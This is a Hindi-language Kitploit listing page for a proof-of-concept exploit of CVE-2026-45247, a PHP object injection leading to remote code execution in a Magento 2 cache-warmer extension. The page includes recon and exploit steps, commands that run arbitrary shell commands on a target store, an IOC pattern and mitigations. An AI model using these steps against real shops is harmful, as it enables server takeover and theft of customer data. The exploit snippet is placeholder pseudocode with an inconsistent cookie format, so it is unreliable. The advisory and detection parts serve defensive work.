Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE- — CVE-2026-45247 - Mirasvit Full Page Cache Warmer for Magento 2 में बिना प्रमाणीकरण के PHP ऑब्जेक्ट इंजेक्शन -> रिमोट कोड निष्पादन | Kitploit
उपकरण/GitHubGitHub/fevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubfevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-

PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE-

CVE-2026-45247 - Mirasvit Full Page Cache Warmer for Magento 2 में बिना प्रमाणीकरण के PHP ऑब्जेक्ट इंजेक्शन -> रिमोट कोड निष्पादन

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-45247 - Magento 2 के लिए Mirasvit Full Page Cache Warmer - PHP ऑब्जेक्ट इंजेक्शन → RCE

CVE-2026-45247 CVSS CISA KEV

📋 विवरण

CVE-2026-45247 Magento 2 और Adobe Commerce के लिए Mirasvit Full Page Cache Warmer एक्सटेंशन में एक गंभीर PHP ऑब्जेक्ट इंजेक्शन भेद्यता है। एक अप्रमाणित हमलावर CacheWarmer कुकी में एक हेरफेर किए गए सीरियलाइज़्ड PHP ऑब्जेक्ट भेजकर रिमोट कोड निष्पादन (RCE) प्राप्त कर सकता है।

यह भेद्यता PHP के मूल unserialize() फ़ंक्शन के अप्रतिबंधित कॉल में निहित है, जो Magento और उसकी निर्भरताओं (विशेष रूप से Monolog) में उपलब्ध गैजेट श्रृंखलाओं (gadget chains) के साथ संयुक्त है।

🚨 हमला तंत्र

  1. एक्सटेंशन CacheWarmer कुकी को हर स्टोर अनुरोध पर प्रोसेस करता है
  2. कुकी का मान बिना सैनिटाइज़ेशन के unserialize() को पास किया जाता है
  3. एक हमलावर एक दुर्भावनापूर्ण सीरियलाइज़्ड PHP ऑब्जेक्ट भेजता है
  4. Monolog की गैजेट श्रृंखलाओं (SyslogUdpHandler, BufferHandler, FingersCrossedHandler) का उपयोग करके RCE प्राप्त किया जाता है
  5. कमांड वेब सेवा के विशेषाधिकारों के साथ सर्वर पर निष्पादित किया जाता है

⚙️ हमले के चरण

चरण 1: पहचान

root@kitploit:~
# जाँच करें कि स्टोर Mirasvit Cache Warmer का उपयोग करता है या नहीं
curl -s https://tienda.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md

चरण 2: भेद्यता विश्लेषण

root@kitploit:~
# कुकी बिना प्रमाणीकरण के प्रत्येक अनुरोध पर प्रोसेस की जाती है
# Mirasvit में भेद्य कोड:
$cookieValue = $_COOKIE['CacheWarmer'];
$data = unserialize(base64_decode($cookieValue));  # खतरा!

चरण 3: एक्सप्लॉइट का निष्पादन

root@kitploit:~
# दुर्भावनापूर्ण कुकी का निर्माण
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"

# अनुरोध भेजना
requests.get(target, cookies={'CacheWarmer': cookie_value})

🛠️ PoC का उपयोग

स्थापना

root@kitploit:~
git clone https://github.com/tu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests

बुनियादी निष्पादन

root@kitploit:~
# भेद्यता की जाँच करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com --check-only

# 'id' कमांड निष्पादित करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "id"

# कस्टम कमांड निष्पादित करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "whoami"

# डिबगिंग के लिए प्रॉक्सी का उपयोग करें
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "ls -la" --proxy http://127.0.0.1:8080

त्वरित स्क्रिप्ट

root@kitploit:~
# bash स्क्रिप्ट से जाँच करें
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://tienda.ejemplo.com

📊 प्रदर्शित प्रभाव

  • Magento सर्वर पर रिमोट कमांड निष्पादन (RCE)
  • ग्राहकों और ऑर्डर डेटाबेस तक पूर्ण पहुंच
  • स्थायित्व के लिए वेबशेल की स्थापना
  • ऑनलाइन स्टोर का पूर्ण समझौता
  • क्रेडिट कार्ड डेटा का संभावित रिसाव
  • कॉर्पोरेट बुनियादी ढांचे में पार्श्व आंदोलन

🛡️ पहचान

समझौता संकेतक (IOCs)

एक्सेस लॉग में:

root@kitploit:~
CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+

शोषण में देखे गए कमांड:

root@kitploit:~
echo PWNED_CVE2026_$(date +%s)
sleep 5

उपयोग की गई गैजेट श्रृंखलाएँ:

  • Monolog\Handler\SyslogUdpHandler
  • Monolog\Handler\BufferHandler
  • Monolog\Handler\FingersCrossedHandler
  • Monolog\Handler\GroupHandler

🔧 शमन

तत्काल अद्यतन

root@kitploit:~
# पैच संस्करण में अद्यतन करें
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush

अस्थायी शमन

root@kitploit:~
# .htaccess या nginx में CacheWarmer कुकी को ब्लॉक करें
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
root@kitploit:~
// app/code/local/Custom/BlockCookie.php में
if (isset($_COOKIE['CacheWarmer'])) {
    unset($_COOKIE['CacheWarmer']);
}
टूल डाउनलोड करें
गुणमान
CVECVE-2026-45247
उत्पादMagento 2 के लिए Mirasvit Full Page Cache Warmer
प्रभावित संस्करण1.11.12 से पहले के सभी संस्करण
उपलब्ध पैचसंस्करण 1.11.12 (25 मई 2026)
CVSS स्कोर9.8 (गंभीर)
वेक्टरAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CISA KEV में स्थितिसक्रिय शोषण की पुष्टि (03/06/2026 को जोड़ा गया)
अंतिम तिथि06/06/2026